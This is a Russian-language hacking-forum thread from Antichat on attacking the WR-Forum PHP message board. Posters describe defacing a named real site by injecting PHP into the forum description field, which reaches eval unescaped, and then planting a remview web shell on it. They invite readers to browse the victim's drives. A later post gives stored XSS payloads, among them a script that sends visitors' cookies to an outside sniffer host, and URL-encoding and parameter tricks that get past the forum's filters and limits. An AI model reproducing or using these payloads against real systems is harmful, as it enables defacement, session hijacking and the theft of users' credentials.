ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Дефейс через форум WR-Forum © 1.7 M
  #1  
Старый 17.05.2006, 17:18
Аватар для Brun
Brun
Участник форума
Регистрация: 21.03.2006
Сообщений: 117
Провел на форуме:
629074

Репутация: 137
Отправить сообщение для Brun с помощью ICQ
Thumbs up Дефейс через форум WR-Forum © 1.7 M

Значит дефейс делал не я а знакомый (don_Pedro)
Глюк форума - неправильная проверка названия темы. В назание темы можно написать
PHP код:
"; phpinfo(); "123 
Но без
PHP код:
<? ?>
Таким же макаром был вставлен шелл ремвью.

Результат http://www.klipov.net/forum/
http://www.klipov.net/remview.php
Подпись http://www.klipov.net/

По названию видно что клипов там нет. Поэтому заходим на диск D: E: Z: и берём там неклипы, нефильмы и т.д.

Просиба не хамить там (не вы же старались). Ну разве чуть-чуть.

Последний раз редактировалось Brun; 17.05.2006 в 17:26..
 
Ответить с цитированием

  #2  
Старый 17.05.2006, 18:05
Аватар для don Pedro
don Pedro
Новичок
Регистрация: 17.05.2006
Сообщений: 3
Провел на форуме:
11313

Репутация: 3
Отправить сообщение для don Pedro с помощью ICQ
По умолчанию

ну Brun немножно сухо написал.... попробую добавить...
Сначала вытянул пас админа (это другая история )
так вот, залез в админку.... подумал как залить шел.... Форум, сразу скажу совковый, нет ниодной опции чтобы залить туда какой-нить файл...
нарыл интересную опцию "описание форума"
Попробовал вставить туда
PHP код:
<? phpinfo(); ?>
не порулило
потом начал думать.... в каком виде может сохранятся это описание.... скорее всего это происходит так
PHP код:
$opisanie="opisanie etogo foruma"
это наводит на одну мысль... если форум совковый, так может творцы сего форума не удосужились проверять строку описания, а?
ну попробовал ввести вот-так
PHP код:
"; phpinfo(); "123 
тут немножко обьясню ход мысли...
сначала нам надо сообщить РНР, что переменная, в которую записывается описание форума уже "закончилась". вот для этого ставим
PHP код:
"; 
дальше понятно,
PHP код:
phpinfo(); 

и последний штрих
PHP код:
"123 
это чтобы не возникло приблизительно вот такой ошибки
Цитата:
Parse error: parse error, unexpected $ in ...
так как в нас остались два символа
PHP код:
"; 
которые сначала закрывали переменную с описанием форума....
проверил - работает...... ну если работает, то что нам мешает вместо любимого
PHP код:
phpinfo(); 
втулить туда код шела?
кто-то скажет: ведь длина описания наверно регулируется... а фиг вам, таварисчи, если творцы форума ламеры, то они ламеры во всем
вставил код шела, перед этим убрал
PHP код:
<? и ?>
заработало
вот так вот
ЗЫЖ а шо это я под ником don_Pedro не смог зарегицца? вродь нет такого юзера....

Последний раз редактировалось don Pedro; 17.05.2006 в 19:55..
 
Ответить с цитированием

  #3  
Старый 18.05.2006, 04:37
Аватар для nix
nix
Banned
Регистрация: 07.05.2006
Сообщений: 36
Провел на форуме:
96196

Репутация: -9
По умолчанию

Не тот сайт ломал блин :d , там медленно качается 9кб/с

Кстати там XSS есть ?

Последний раз редактировалось nix; 18.05.2006 в 04:44..
 
Ответить с цитированием

  #4  
Старый 18.05.2006, 10:32
Аватар для don Pedro
don Pedro
Новичок
Регистрация: 17.05.2006
Сообщений: 3
Провел на форуме:
11313

Репутация: 3
Отправить сообщение для don Pedro с помощью ICQ
По умолчанию

2nix
а хз, не проверял, кстати, ты хоть смотрел на тот сайт??
прикол в том, что делал его один мего-ламер, хостится это все дело у него на компе дома, кажись в Испании, на винде... а ща самое интересное.... НА ДЕНВЕРЕ
кстати он типа пропалил.. ну ниче, еще что-нить найдем
 
Ответить с цитированием

  #5  
Старый 18.05.2006, 11:35
Аватар для c411k
c411k
Reservists Of Antichat - Level 6
Регистрация: 16.07.2005
Сообщений: 653
Провел на форуме:
8854279

Репутация: 2727


По умолчанию

Цитата:
Сообщение от don Pedro  
кстати он типа пропалил..
ха, если бы не ставил "типа" деф, то все было бы нормально..
__________________
ПИУ-ПИУ...
 
Ответить с цитированием

  #6  
Старый 18.05.2006, 11:39
Аватар для Li4inka
Li4inka
Banned
Регистрация: 14.05.2006
Сообщений: 8
Провел на форуме:
45799

Репутация: -10
По умолчанию

точнее там идет преобразование функцией eval, без экранирования "
 
Ответить с цитированием

  #7  
Старый 18.05.2006, 13:12
Аватар для degeneration x
degeneration x
Познающий
Регистрация: 11.10.2005
Сообщений: 97
Провел на форуме:
732018

Репутация: 117
По умолчанию

Цитата:
вставил код шела, перед этим убрал
PHP код:
<? и ?>
заработало
вот так вот
А зачем туда вставлять код? Гораздо удобнее сделать include.
 
Ответить с цитированием

  #8  
Старый 18.05.2006, 13:14
Аватар для don Pedro
don Pedro
Новичок
Регистрация: 17.05.2006
Сообщений: 3
Провел на форуме:
11313

Репутация: 3
Отправить сообщение для don Pedro с помощью ICQ
По умолчанию

не ну да, но...... поперло
тем более... не хакер я
разве шо чуть-чуть

Последний раз редактировалось don Pedro; 18.05.2006 в 13:19..
 
Ответить с цитированием

  #9  
Старый 18.09.2007, 23:49
Аватар для DCRM
DCRM
Познающий
Регистрация: 12.12.2006
Сообщений: 89
Провел на форуме:
500895

Репутация: 60
Отправить сообщение для DCRM с помощью ICQ
Arrow

Напишу мини-мануал-историю (надо же мне на этом форуме с чего то начинать!)

На форуме WR-Forum © 1.8 совершенно нет проверки на html у себя в подписи... да что там в подписи, вообще практически нигде нету!

Дело было где то часа в 2 ночи... думаю... проект новенький, интересный! есть раздел по JavaScript где мне могут помочь! Но тут столкнулся с неприятностью... В нужном разделе показалось сообщение:
Цитата:
Количество допустимых тем в рубрике исчерпано.
Немного обидевшись решил создать где нить в другом разделе.. и что я увидел:
Код:
index.php?fid=8&newtema=add
Дай ка думаю номер нужного раздела поставлю... и уваля! Работает! вот так и обходим ограничение тем
М... понравилось! решил поиграть с форумом)


гыгы) автор скрипта-редиска!
Код:
index.php?fid=9999&newtema=add
Далее, ввёл номер форума которого нету... и... он есть, наверно "скрытый" раздел...
index.php?fid=x
x-любая цифра

хех... ещё при добавлении сообщения можно спокойно вернуться назад и ещё раз добавить мессагу) короче оспамить легко!

А теперь самое интересное... XSS
У себя в инфе в подписи, да и в других полях анкеты делайте что хотите! =)

Хотим что бы жуткий аллерт досаждал посетителям?
Пишем у себя в статусе:
Код:
<IMG SRC=JaVaScRiPt:alert('XSS by DCRM')>
Хотите стырить куки?
Возьмём к примеру снифер:
Код:
http://s.netsec.ru/
Далее подумав, делаем так:
Код:
<script>img.src = "'http://s.netsec.ru/ваш логин.gif?'+document.cookie;"</script>
Но у автора стоит ограничение на длину сообщения... кхм... поиграем по его правилам, не долго думая сделал файлик скрипта и залил к себе на хост... => всё да ничего, но у автор форума сделал замену тексту ссылок на хреф... и это не проблема, достаточно лишь закодировать 1ю букву адреса:
Код:
<SCRIPT SRC="http://%77ww.xxx.xx/x.xx"></script>
И уваля! остаётся только ждать...

И того, это первый мой интересный взлом) спасибо за внимание!

P.s. а дальше дело техники и воображения) Админ есть... куки есть, кстати в незашифрованном виде там пассы...

Последний раз редактировалось DCRM; 18.09.2007 в 23:54..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
дефейс сайта через форум burbon Форумы 1 20.10.2005 01:35
Взлом сервера Microsoft IIS 6 Через SQL Запросы [Tsh] *CorPSe* АнтиАдмин 3 08.03.2005 12:16
Надо снести ФОРУМ FUNTiK Болталка 4 09.01.2005 23:43
Дефейс 4ерез Vbulletin 3.0.3 ProTeuS Форумы 6 25.12.2004 04:43



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ